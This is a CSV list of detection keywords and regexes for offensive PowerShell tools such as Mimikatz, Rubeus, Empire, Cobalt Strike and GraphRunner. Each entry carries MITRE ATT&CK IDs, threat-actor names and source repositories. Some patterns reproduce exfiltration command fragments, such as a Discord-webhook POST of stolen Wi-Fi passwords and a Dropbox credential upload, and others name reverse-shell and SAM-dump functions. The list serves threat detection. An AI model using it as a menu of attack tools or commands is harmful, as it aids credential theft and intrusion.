"*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-RemoteMimikatz*",".{0,1000}Invoke\-RemoteMimikatz.{0,1000}","offensive_tool_keyword","Mimikatz","PowerShell Scripts focused on Post-Exploitation Capabilities","T1003 - T1055 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","10","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-RemoteScriptWithOutput*",".{0,1000}Invoke\-RemoteScriptWithOutput.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*",".{0,1000}Invoke\-RestMethod\s\-ContentType\s\'Application\/Json\'\s\-Uri\s\$discord\s\-Method\sPost\s\-Body\s\(\$Body\s\|\sConvertTo\-Json\).{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *",".{0,1000}Invoke\-RestMethod\s\-Uri\shttps\:\/\/content\.dropboxapi\.com\/2\/files\/upload\s\-Method\sPost\s\s\-InFile\s.{0,1000}\s\s\-Headers\s.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*invokereverttoself*",".{0,1000}invokereverttoself.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-RevShellServer.ps1*",".{0,1000}Invoke\-RevShellServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RIDHijacking*",".{0,1000}Invoke\-RIDHijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*invoke-ridhijacking.py*",".{0,1000}invoke\-ridhijacking\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*Invoke-Rubeus *",".{0,1000}Invoke\-Rubeus\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RunAs.ps1*",".{0,1000}Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*invoke-runaspayload*",".{0,1000}invoke\-runaspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-RunningProcessCheck*",".{0,1000}Invoke\-RunningProcessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-S3ssionGoph3r*",".{0,1000}Invoke\-S3ssionGoph3r.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-S4U-persistence.ps1*",".{0,1000}Invoke\-S4U\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Invoke-SafetyKatz*",".{0,1000}Invoke\-SafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SamBackupFilesCheck*",".{0,1000}Invoke\-SamBackupFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-SauronEye*",".{0,1000}Invoke\-SauronEye.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SccmCacheFolderCheck*",".{0,1000}Invoke\-SccmCacheFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ScheduledTasksCheck*",".{0,1000}Invoke\-ScheduledTasksCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ScheduledTasksImagePermissionsCheck*",".{0,1000}Invoke\-ScheduledTasksImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ScheduledTasksUnquotedPathCheck*",".{0,1000}Invoke\-ScheduledTasksUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SCMPermissionsCheck*",".{0,1000}Invoke\-SCMPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SCOMDecrypt*",".{0,1000}Invoke\-SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*Invoke-ScriptSentry*",".{0,1000}Invoke\-ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Invoke-SCShell*",".{0,1000}Invoke\-SCShell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SDCLTBypass*",".{0,1000}Invoke\-SDCLTBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SDPropagator*",".{0,1000}Invoke\-SDPropagator.{0,1000}","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","1","68","12","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z" "*Invoke-SearchMailbox*",".{0,1000}Invoke\-SearchMailbox.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Has the ability to do deep searches across a user?s mailbox and can export messages","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SearchSharePointAndOneDrive*",".{0,1000}Invoke\-SearchSharePointAndOneDrive.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Search across all SharePoint sites and OneDrive drives visible to the user","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SearchTeams -Tokens *",".{0,1000}Invoke\-SearchTeams\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SearchUserAttributes*Search for terms across all user attributes in a directory*",".{0,1000}Invoke\-SearchUserAttributes.{0,1000}Search\sfor\sterms\sacross\sall\suser\sattributes\sin\sa\sdirectory.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SecretsDump.ps1*",".{0,1000}Invoke\-SecretsDump\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-SecurityGroupCloner -Tokens *",".{0,1000}Invoke\-SecurityGroupCloner\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SecurityGroupCloner*",".{0,1000}Invoke\-SecurityGroupCloner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Clones a security group while using an identical name and member list but can inject another user as well","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SendMail -Targets*",".{0,1000}Invoke\-SendMail\s\-Targets.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-SendReverseShell*",".{0,1000}Invoke\-SendReverseShell.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-SendToPasteBin*",".{0,1000}Invoke\-SendToPasteBin.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-SensitiveHiveFileAccessCheck*",".{0,1000}Invoke\-SensitiveHiveFileAccessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SensitiveHiveShadowCopyCheck*",".{0,1000}Invoke\-SensitiveHiveShadowCopyCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" 